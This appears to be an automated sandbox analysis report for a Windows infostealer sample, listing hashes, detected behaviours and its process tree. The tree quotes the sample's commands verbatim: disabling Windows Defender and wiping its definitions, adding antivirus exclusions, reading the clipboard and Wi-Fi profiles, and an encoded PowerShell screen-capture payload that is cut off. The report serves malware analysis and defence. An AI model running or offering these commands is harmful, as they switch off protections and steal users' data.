Analysis
-
max time kernel
92s -
max time network
96s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-11-2024 21:02
Behavioral task
behavioral1
Sample
MCF!nd3r.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
�p���.pyc
Resource
win11-20241007-en
General
-
Target
MCF!nd3r.exe
-
Size
7.4MB
-
MD5
2d2d697a3378e745cf1f5da6378df2b3
-
SHA1
fa466f27da31f58b772a50ab37a6572d520854f0
-
SHA256
eaab7c571851ea0d19f0ee130e0399d8037834e93850194dcdec64ee6c0bcf58
-
SHA512
8d7b9bffe4ee904e98f119c1b348535c92daa2299d0e401fbfbb88373754e46fc74e96eabd25d0eab3415a29cafa8cb1804158aedb003d151594b2995ecc50fd
-
SSDEEP
98304:XXLMcbeurErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuIyKU78bcgPowNMp:X3eurErvI9pWjgyvoaYrE41JIuIzoOY
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2792 powershell.exe 4232 powershell.exe 2432 powershell.exe 1476 powershell.exe 2472 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeattrib.exeMCF!nd3r.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts MCF!nd3r.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 4240 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
MCF!nd3r.exepid Process 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe 4796 MCF!nd3r.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ip-api.com 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid Process 576 tasklist.exe 3744 tasklist.exe 2060 tasklist.exe 2792 tasklist.exe 3424 tasklist.exe -
Processes:
resource yara_rule behavioral1/files/0x001900000002aab2-21.dat upx behavioral1/memory/4796-25-0x00007FF984820000-0x00007FF984E10000-memory.dmp upx behavioral1/memory/4796-29-0x00007FF98CB10000-0x00007FF98CB34000-memory.dmp upx behavioral1/files/0x001900000002aaa5-27.dat upx behavioral1/files/0x001900000002aab0-30.dat upx behavioral1/memory/4796-32-0x00007FF98E440000-0x00007FF98E44F000-memory.dmp upx behavioral1/files/0x001100000002aab1-35.dat upx behavioral1/files/0x001900000002aab6-39.dat upx behavioral1/files/0x001900000002aab5-38.dat upx behavioral1/files/0x001900000002aaaf-34.dat upx behavioral1/files/0x001900000002aaa6-42.dat upx behavioral1/files/0x001900000002aaa7-43.dat upx behavioral1/files/0x001b00000002aaa4-41.dat upx behavioral1/files/0x001900000002aab7-40.dat upx behavioral1/files/0x001900000002aaa9-45.dat upx behavioral1/files/0x001900000002aaa8-44.dat upx behavioral1/files/0x001900000002aaaa-46.dat upx behavioral1/files/0x001900000002aaac-48.dat upx behavioral1/files/0x001900000002aaab-47.dat upx behavioral1/memory/4796-54-0x00007FF98CA80000-0x00007FF98CAAD000-memory.dmp upx behavioral1/memory/4796-56-0x00007FF98A0A0000-0x00007FF98A0B9000-memory.dmp upx behavioral1/memory/4796-58-0x00007FF989F00000-0x00007FF989F23000-memory.dmp upx behavioral1/memory/4796-60-0x00007FF978020000-0x00007FF978196000-memory.dmp upx behavioral1/memory/4796-64-0x00007FF98A090000-0x00007FF98A09D000-memory.dmp upx behavioral1/memory/4796-63-0x00007FF989EE0000-0x00007FF989EF9000-memory.dmp upx behavioral1/memory/4796-66-0x00007FF9892D0000-0x00007FF989303000-memory.dmp upx behavioral1/memory/4796-71-0x00007FF988F30000-0x00007FF988FFD000-memory.dmp upx behavioral1/memory/4796-70-0x00007FF984820000-0x00007FF984E10000-memory.dmp upx behavioral1/memory/4796-74-0x00007FF98CB10000-0x00007FF98CB34000-memory.dmp upx behavioral1/memory/4796-73-0x00007FF977AF0000-0x00007FF978019000-memory.dmp upx behavioral1/memory/4796-79-0x00007FF989F50000-0x00007FF989F5D000-memory.dmp upx behavioral1/memory/4796-81-0x00007FF9779D0000-0x00007FF977AEC000-memory.dmp upx behavioral1/memory/4796-78-0x00007FF98CA80000-0x00007FF98CAAD000-memory.dmp upx behavioral1/memory/4796-76-0x00007FF9892B0000-0x00007FF9892C4000-memory.dmp upx behavioral1/memory/4796-106-0x00007FF989F00000-0x00007FF989F23000-memory.dmp upx behavioral1/memory/4796-107-0x00007FF978020000-0x00007FF978196000-memory.dmp upx behavioral1/memory/4796-223-0x00007FF989EE0000-0x00007FF989EF9000-memory.dmp upx behavioral1/memory/4796-306-0x00007FF9892D0000-0x00007FF989303000-memory.dmp upx behavioral1/memory/4796-319-0x00007FF988F30000-0x00007FF988FFD000-memory.dmp upx behavioral1/memory/4796-324-0x00007FF977AF0000-0x00007FF978019000-memory.dmp upx behavioral1/memory/4796-343-0x00007FF984820000-0x00007FF984E10000-memory.dmp upx behavioral1/memory/4796-349-0x00007FF978020000-0x00007FF978196000-memory.dmp upx behavioral1/memory/4796-344-0x00007FF98CB10000-0x00007FF98CB34000-memory.dmp upx behavioral1/memory/4796-358-0x00007FF984820000-0x00007FF984E10000-memory.dmp upx behavioral1/memory/4796-372-0x00007FF9779D0000-0x00007FF977AEC000-memory.dmp upx behavioral1/memory/4796-373-0x00007FF977AF0000-0x00007FF978019000-memory.dmp upx behavioral1/memory/4796-371-0x00007FF989F50000-0x00007FF989F5D000-memory.dmp upx behavioral1/memory/4796-370-0x00007FF9892B0000-0x00007FF9892C4000-memory.dmp upx behavioral1/memory/4796-368-0x00007FF988F30000-0x00007FF988FFD000-memory.dmp upx behavioral1/memory/4796-367-0x00007FF9892D0000-0x00007FF989303000-memory.dmp upx behavioral1/memory/4796-366-0x00007FF98A090000-0x00007FF98A09D000-memory.dmp upx behavioral1/memory/4796-365-0x00007FF989EE0000-0x00007FF989EF9000-memory.dmp upx behavioral1/memory/4796-364-0x00007FF978020000-0x00007FF978196000-memory.dmp upx behavioral1/memory/4796-363-0x00007FF989F00000-0x00007FF989F23000-memory.dmp upx behavioral1/memory/4796-362-0x00007FF98A0A0000-0x00007FF98A0B9000-memory.dmp upx behavioral1/memory/4796-361-0x00007FF98CA80000-0x00007FF98CAAD000-memory.dmp upx behavioral1/memory/4796-360-0x00007FF98E440000-0x00007FF98E44F000-memory.dmp upx behavioral1/memory/4796-359-0x00007FF98CB10000-0x00007FF98CB34000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid Process 5024 WMIC.exe 1568 WMIC.exe 2592 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2792 powershell.exe 1476 powershell.exe 2792 powershell.exe 1476 powershell.exe 2472 powershell.exe 2472 powershell.exe 4860 powershell.exe 4860 powershell.exe 1256 powershell.exe 1256 powershell.exe 4860 powershell.exe 1256 powershell.exe 4232 powershell.exe 4232 powershell.exe 2344 powershell.exe 2344 powershell.exe 2432 powershell.exe 2432 powershell.exe 3128 powershell.exe 3128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exeWMIC.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 576 tasklist.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeIncreaseQuotaPrivilege 5024 WMIC.exe Token: SeSecurityPrivilege 5024 WMIC.exe Token: SeTakeOwnershipPrivilege 5024 WMIC.exe Token: SeLoadDriverPrivilege 5024 WMIC.exe Token: SeSystemProfilePrivilege 5024 WMIC.exe Token: SeSystemtimePrivilege 5024 WMIC.exe Token: SeProfSingleProcessPrivilege 5024 WMIC.exe Token: SeIncBasePriorityPrivilege 5024 WMIC.exe Token: SeCreatePagefilePrivilege 5024 WMIC.exe Token: SeBackupPrivilege 5024 WMIC.exe Token: SeRestorePrivilege 5024 WMIC.exe Token: SeShutdownPrivilege 5024 WMIC.exe Token: SeDebugPrivilege 5024 WMIC.exe Token: SeSystemEnvironmentPrivilege 5024 WMIC.exe Token: SeRemoteShutdownPrivilege 5024 WMIC.exe Token: SeUndockPrivilege 5024 WMIC.exe Token: SeManageVolumePrivilege 5024 WMIC.exe Token: 33 5024 WMIC.exe Token: 34 5024 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MCF!nd3r.exeMCF!nd3r.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 4464 wrote to memory of 4796 4464 MCF!nd3r.exe 79 PID 4464 wrote to memory of 4796 4464 MCF!nd3r.exe 79 PID 4796 wrote to memory of 3180 4796 MCF!nd3r.exe 81 PID 4796 wrote to memory of 3180 4796 MCF!nd3r.exe 81 PID 4796 wrote to memory of 2912 4796 MCF!nd3r.exe 82 PID 4796 wrote to memory of 2912 4796 MCF!nd3r.exe 82 PID 4796 wrote to memory of 4984 4796 MCF!nd3r.exe 83 PID 4796 wrote to memory of 4984 4796 MCF!nd3r.exe 83 PID 4796 wrote to memory of 3092 4796 MCF!nd3r.exe 87 PID 4796 wrote to memory of 3092 4796 MCF!nd3r.exe 87 PID 4796 wrote to memory of 4560 4796 MCF!nd3r.exe 89 PID 4796 wrote to memory of 4560 4796 MCF!nd3r.exe 89 PID 3092 wrote to memory of 576 3092 cmd.exe 91 PID 3092 wrote to memory of 576 3092 cmd.exe 91 PID 2912 wrote to memory of 2792 2912 cmd.exe 92 PID 2912 wrote to memory of 2792 2912 cmd.exe 92 PID 4984 wrote to memory of 2040 4984 cmd.exe 93 PID 4984 wrote to memory of 2040 4984 cmd.exe 93 PID 4560 wrote to memory of 4928 4560 cmd.exe 94 PID 4560 wrote to memory of 4928 4560 cmd.exe 94 PID 3180 wrote to memory of 1476 3180 cmd.exe 95 PID 3180 wrote to memory of 1476 3180 cmd.exe 95 PID 4796 wrote to memory of 4880 4796 MCF!nd3r.exe 97 PID 4796 wrote to memory of 4880 4796 MCF!nd3r.exe 97 PID 4880 wrote to memory of 4636 4880 cmd.exe 99 PID 4880 wrote to memory of 4636 4880 cmd.exe 99 PID 4796 wrote to memory of 4004 4796 MCF!nd3r.exe 100 PID 4796 wrote to memory of 4004 4796 MCF!nd3r.exe 100 PID 4004 wrote to memory of 1276 4004 cmd.exe 102 PID 4004 wrote to memory of 1276 4004 cmd.exe 102 PID 4796 wrote to memory of 3192 4796 MCF!nd3r.exe 144 PID 4796 wrote to memory of 3192 4796 MCF!nd3r.exe 144 PID 3192 wrote to memory of 5024 3192 cmd.exe 105 PID 3192 wrote to memory of 5024 3192 cmd.exe 105 PID 4796 wrote to memory of 3196 4796 MCF!nd3r.exe 106 PID 4796 wrote to memory of 3196 4796 MCF!nd3r.exe 106 PID 3196 wrote to memory of 1568 3196 cmd.exe 168 PID 3196 wrote to memory of 1568 3196 cmd.exe 168 PID 4796 wrote to memory of 4508 4796 MCF!nd3r.exe 109 PID 4796 wrote to memory of 4508 4796 MCF!nd3r.exe 109 PID 4508 wrote to memory of 2472 4508 cmd.exe 111 PID 4508 wrote to memory of 2472 4508 cmd.exe 111 PID 4796 wrote to memory of 2652 4796 MCF!nd3r.exe 112 PID 4796 wrote to memory of 2652 4796 MCF!nd3r.exe 112 PID 4796 wrote to memory of 3704 4796 MCF!nd3r.exe 113 PID 4796 wrote to memory of 3704 4796 MCF!nd3r.exe 113 PID 2652 wrote to memory of 2060 2652 cmd.exe 116 PID 2652 wrote to memory of 2060 2652 cmd.exe 116 PID 3704 wrote to memory of 3744 3704 cmd.exe 117 PID 3704 wrote to memory of 3744 3704 cmd.exe 117 PID 4796 wrote to memory of 3068 4796 MCF!nd3r.exe 118 PID 4796 wrote to memory of 3068 4796 MCF!nd3r.exe 118 PID 4796 wrote to memory of 2336 4796 MCF!nd3r.exe 119 PID 4796 wrote to memory of 2336 4796 MCF!nd3r.exe 119 PID 4796 wrote to memory of 2456 4796 MCF!nd3r.exe 121 PID 4796 wrote to memory of 2456 4796 MCF!nd3r.exe 121 PID 4796 wrote to memory of 4812 4796 MCF!nd3r.exe 122 PID 4796 wrote to memory of 4812 4796 MCF!nd3r.exe 122 PID 4796 wrote to memory of 2560 4796 MCF!nd3r.exe 126 PID 4796 wrote to memory of 2560 4796 MCF!nd3r.exe 126 PID 4796 wrote to memory of 4848 4796 MCF!nd3r.exe 127 PID 4796 wrote to memory of 4848 4796 MCF!nd3r.exe 127 PID 4796 wrote to memory of 3920 4796 MCF!nd3r.exe 128 PID 4796 wrote to memory of 3920 4796 MCF!nd3r.exe 128 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 1332 attrib.exe 1428 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MCF!nd3r.exe"C:\Users\Admin\AppData\Local\Temp\MCF!nd3r.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\MCF!nd3r.exe"C:\Users\Admin\AppData\Local\Temp\MCF!nd3r.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MCF!nd3r.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MCF!nd3r.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error.dat', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error.dat', 0, 'Error', 0+16);close()"4⤵PID:2040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3068
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2456
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4812
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2560 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4848
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:3920
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAd